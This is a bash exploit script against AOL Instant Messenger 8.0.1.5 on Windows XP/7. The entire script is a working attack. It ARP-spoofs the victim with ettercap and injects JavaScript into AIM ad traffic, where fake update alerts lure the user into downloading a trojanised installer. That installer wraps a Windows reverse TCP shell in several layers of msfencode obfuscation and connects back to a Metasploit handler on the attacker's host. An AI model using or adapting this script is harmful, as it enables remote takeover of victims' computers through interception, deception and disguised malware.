#!/bin/bash ### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working. ### Leverages binary file planting to My Documents via AIMs advertisement code. ### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe. ### Starts a reverse shell back to your handler on 192.168.2.5:443 by default. ### Marshall Whittaker ATTACKER="192.168.2.10"; VICTIM="192.168.2.5"; GATEWAY="192.168.2.1"; REVPORT="443"; PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1"; mkdir ~/aimpwn; echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter; echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter; echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter; echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter; echo "}" >> ~/aimpwn/aimpwn.filter; echo "}" >> ~/aimpwn/aimpwn.filter; etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef; ### wget section. #wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe; cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/; msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe; ### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to ### change ATTACKER IP or port. ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ & msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;